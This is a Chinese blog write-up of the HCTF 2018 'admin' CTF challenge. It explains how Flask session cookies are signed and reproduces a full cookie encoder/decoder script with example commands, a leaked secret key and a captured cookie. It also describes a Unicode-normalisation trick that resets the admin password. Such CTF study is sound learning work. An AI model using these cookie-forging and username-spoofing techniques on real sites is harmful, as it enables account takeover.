[HCTF 2018]admin(flask session伪造,Unicode欺骗)

最新推荐文章于 2024-03-12 17:26:40 发布
最新推荐文章于 2024-03-12 17:26:40 发布
阅读量2.7k 收藏 3
点赞数 1
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104594655
版权

先随便注册一个账号进去看看。

在index的源码处找到提示,you are not admin,估计是要用admin的身份登录才会有flag。
在这里插入图片描述
然后在change的源码找到了网站项目的github地址:
在这里插入图片描述

下载下来是一个flask项目,这里看了看wp知道要看路由route.py,然而我这种菜鸡是看不懂的。

有三种解题方法,不过看其他wp第三种都没有实现。

一,flask session伪造:

这里我知道了flask的session如果要加密或者解密需要一个SECRET_KEY

序列化session的主要过程:

1,json.dumps 将对象转换成json字符串,作为数据
2,如果数据压缩后长度更短,则用zlib库进行压缩
3,将数据用base64编码
4,通过hmac算法计算数据的签名,将签名附在数据后,用“.”分割

第4步就解决了用户篡改session的问题,因为在不知道secret_key的情况下,是无法伪造签名的。这道题的源码给出了secret_key,所以可以session伪造。

参考:https://www.leavesongs.com/PENETRATION/client-session-security.html

然后直接用脚本加解密:
地址:https://github.com/noraj/flask-session-cookie-manager

""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

使用方法:

解密:python flask_session_manager.py decode -s SECRET_KEY -c session

加密:python flask_session_manager.py encode -s SECRET_KEY -t 未加密session

先抓登录成功界面的包,然后解密session:

python3 1.py decode -s ckj123 -c .eJw9kE9rwjAYxr_KeM8eurTCEDw4UkOF9w2VZCO5SLXVpjYOqlIb8buvk-HpOfzg-XeHzb6rzjXMLt21msDGlTC7w9sWZkC8bInnCQbdU_g6Wq5j45cO_cobpQOF0llVeqkWPXHriOU3E5Y18dZZoRmGdJAqTSjoqfEmlmJVU9hFKHCw6sCoMQOF2pNPI8n1DccM4_MeFUbIdWK9TpDvBmzS3qi2Rr6YSpXHttG9FYaZQK0V67FPNofHBHbnbr-5_Byr02sCsoxZnzGp2saMimHt7F9V_umR29qKLDZNOpCwtfxeOhqnUT5_2jlfHKqX09Z_sPyfnAo_AiiKAiZwPVfd8zV4j-DxC2jGbMw.XltvVw.hbTHaI6lG6Fn3uXRaeFlhoTtcCg

解密后的session如下:
{'_fresh': True, '_id': b'47e44835075dd57bab2bfa5377be7f90046b7d1c1a49bde6312918759bf78ba7740c2e8666278f6a485135dbd0134058fe8072210a9a009947f50df6c3eddb2b', 'csrf_token': b'3b6fb699cbb634bd6b40f06adb7b124fa9ab6bf5', 'image': b'no6A', 'name': 'aaa', 'user_id': '10'}

在这里插入图片描述
然后把name改为admin加密试试:
{’_fresh’: True, ‘_id’: b’47e44835075dd57bab2bfa5377be7f90046b7d1c1a49bde6312918759bf78ba7740c2e8666278f6a485135dbd0134058fe8072210a9a009947f50df6c3eddb2b’, ‘csrf_token’: b’3b6fb699cbb634bd6b40f06adb7b124fa9ab6bf5’, ‘image’: b’no6A’, ‘name’: ‘admin’, ‘user_id’: ‘10’}
但是试了很多次就是不行。。
在这里插入图片描述
二,Unicode欺骗

首先我们注册一个
ᴬᴰᴹᴵᴺ的账户,这时候我们传入的数据会进行一次转化,这时ᴬᴰmin–>ADmin,服务器端会判断该用户是否存在,然后成功注册
在这里插入图片描述
登陆该账号,因为登陆时也会被进行一次转化,所以使用ᴬᴰᴹᴵᴺ登陆,但后台的账号是ADmin

在这里插入图片描述
然后执行一次更改密码操作,改密码时也会进行一次转化,这时我们便从ADmin–>admin,完成了admin账户的密码更改操作,这时候再登陆admin账号,就可以得到flag了

在这里插入图片描述

天问_Herbert555
关注
专栏目录
buuctf之[HCTF 2018]admin
qq_42728977的博客
12-06 612
[HCTF 2018]admin考点session伪造流程思考参考 考点 1、弱口令 2、flask框架 session伪造 3、代码审计 unicode strlower()函数审计 session伪造流程 change页面的源码,泄露后台源码 index源码看得到,要admin登录 所以查看后台源码 发现需要登录认证和session[‘name’]为admin,那就伪造呗。 flask session伪造 session漏洞 流程: 先注册一个用户test/test,并登录 拿到session
HCTF 2018]admin
夜幕下的灯火阑珊的博客
05-12 1014
知识点 unicode欺骗 session伪造 解法一:unicode欺骗 查看源码发现 <!-- you are not admin --> 应该是要注册成admin用户 先注册一个admin1用户,登录后在change password页面查看源码,发现 <!-- https://github.com/woadsl1234/hctf_flask/ --> 访问后可取得源码,部分源码如下 def change(): if not current_user.is_
Flasksession伪造
TenG的博客
05-22 4277
前言 本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF中的[HCTF 2018]admin来说一下,文中比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
flask session伪造
shao65308的专栏
11-10 235
修改为:{'is_admin': True, 'name': 'admin', 'user_id': 1}生成所有可能的secre_key文件。爆破是用了哪个secre_key。把生成的字符串替换Cookie值。
Flask中的session伪造
m0_60716947的博客
10-18 1209
flasksession伪造
技术分享 跨越语言的艺术:Flask Session 伪造
m0_46699477的博客
10-18 333
在白帽汇安全研究院,漏洞检测和利用是一项创造性的工作,我们致力于以最简洁,高效的方式来实现。为了在 Goby 中实现 Flask Session 生成和利用方法,我们花费大量精力去调试 Flask 源码,分析 Session 的构造过程。最终,我们成功在 Go 语言中实现了 Flask Session 校验和生成方法。
HCTF2018-admin
迷风小白
09-11 1万+
前言 在BUUCTF上看到这题存在三种解法,感觉比较经典,就想着来复现一下顺便学习一波。存在以下三种解法: flask session 伪造 unicode欺骗 条件竞争 审题 拿到题目发现一共就登录注册两个功能,随便注册一个test/test用户 登录之后查看源码发现提示<!-- you are not admin -->,根据提示和题目名估计要让我们登录admin用户就可以得...
HCTF 2018admin ——flask session伪造unicode伪造
4pri1
02-10 363
[HCTF 2018]admin ——flask session伪造||unicode伪造 猜测要么从url栏,要么从注册登录部分注入 猜admin的密码 123,对了本题结束。 如果按照完整解这个题 查看源代码,发现新提示 其余没有提示,先注册账号并登录 更新了新的change password 和post页面 在change password发现新提示 注册从bp抓包入手 admin不能注册 但是发现报文里有session所以不
CTF学习笔记——[HCTF 2018]admin
Obs_cure的博客
02-15 2784
一、[HCTF 2018]admin 1.题目 2.解题步骤 这个靶场还是很完整的,注册登陆一应俱全,还有留言板。注册和登陆部分尝试了一下,大部分我认知中的注入都被过滤了。于是老老实实注册了个账号。发现里面有个留言板。这不就是师傅们经常攻击的地方吗~ 随便注入的两下没什么反应,看看源码呢~ 嗯?这个注释? 虽然能猜到这个是网站的源码,但由于没有网页的开发经验,所以很遗憾还是没看出什么门道~看WriteUp! 说实话看完之后有点被震撼到。跟着师傅们把三种做法都过一遍~ 这道题的突破口首先是github
flask中的session伪造问题
m0_62422842的博客
09-05 2790
flask中的session伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
Flasksession伪造(从某平台学习Session身份伪造)
热门推荐
Y4tacker的博客
08-02 1万+
文章目录工具介绍FLASK解密FLASK加密脚本 工具介绍 FLASK解密 不推荐网上那个,反而这个倒是挺好用 #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payl
session,PIN码伪造学习(py flask)
最新发布
oyf3085227433的博客
03-12 2515
学习一下伪造session,PIN码的知识
flask session 伪造
DonkeyMoon的博客
11-14 839
之前遇到过一道题,可以用session伪造,也还有其他方法,就用session伪造复现一下。 由于 flask 是非常轻量级的 Web框架 ,其 session 存储在客户端中(可以通过HTTP请求头Cookie字段的session获取),而且只经过base64编码和用密钥签名,缺少数据防篡改实现,这便很容易存在安全漏洞。要想伪造session,首先要知道SECRET_KEY,如果存在模板注入的话SECRET_KEY可能会在config中,不存在模板注入也可能从一些源码中得到([HCTF 2018]admi
KnightCTF-2022_Can you be Admin?
weixin_46245411的博客
01-24 2587
直接查看一下网址源码,发现真的空空如也, 这种情况可以考虑:1、扫一下后台;2、BP抓包;3、跑一下隐藏参数...... 由于比赛说明不需要扫描,所以下一步直接BP抓包, 根据“Only KnightSquad agents can access this page.” 发现发送的数据包中的,“User-Agent” 与提示有联系,所以直接修改, User-Agent: KnightSquad 根据“This page refers to knight squad...
[HCTF 2018]adminFlasksession伪造
weixin_52116519的博客
04-22 3052
接解法一 解法二:Flasksession伪造 原理 首先要明确cookie和session的区别:cookie放在客户端,我们可以获得的。session放在服务器,我们无法拿到的,但是flask这种轻量级的框架,session就放在了客户端,因此我们能拿来修改,这就是我们能session伪造的原因。session加密了,可以用解密脚本来解密。我们将一般用户的session修改为adminsession,再用加密脚本加上秘钥来加密成adminsession就OK了。 过程 参考文章 Flask之ses
BUUCTF [HCTF 2018]admin
qq_42158602的博客
01-11 1153
第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面 查看一下源码 有个注释 应该是提示我们用admin账号登录 先随便注册一个账号看看 登录成功后有三个界面 随便看了看 先去登录注册页面试试有什么注入没有 在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性 报错了 ,好像没行。不过这界面还能运行python 可以看见一些东西 ,感觉...
新型***利用文件名欺骗伪装
weixin_34174322的博客
10-31 288
转载自“赛迪网” 日前一种新型***被截获,***程序本身并不复杂,但病毒作者采用的欺骗手法却十分高明。   该病毒在文件名中插入RLO控制符(注:RLO控制符是Unicode控制符的一种,用来显示中东文字,从右到左书写),使得字符显示从右至左的顺序,让病毒程序的真实后辍名(.exe/.scr/.com等)被隐藏,伪装后的病毒看起来是...
HCTFadmin--关于flasksession伪造unicode欺骗
unexpectedthing的博客
11-07 925
文章目录CTF题目非预期解预期解解法1---flask session伪造解法2----Unicode欺骗解法3---条件竞争 CTF题目 地址:HCTF-admin 非预期解 可以直接登录,利用弱口令 login页面,账号:admin,密码:123,就直接得到flag 预期解 首先进去看到几个界面,login,register,和登录成功后(自己注册然后登录)的四个界面。 然后在index页面源码发现提示,you are not admin,估计题目是让我们登录成admin,然后出flag,于是想到cha
buuctf [HCTF 2018]adminflask cookie伪造
qq_44111753的博客
01-02 1131
知识点 1、flask cookie伪造 2、flask中的SECRET_ KEY值作用 Flask、Django的 secret key 设置有什么用? SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用其名所示,加密的强度取决于变量值的机密度.不同的程序要使用不同的密钥,而且要保证其他人不知道你所用的字符串,SECRET_KEY的作用主要是提供一个值做各种HASH,主要的作用应该是在其加密过程中作为算法的一个参数(salt或其他).所以这个值的复杂度也就影响到了数据传输和存储
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值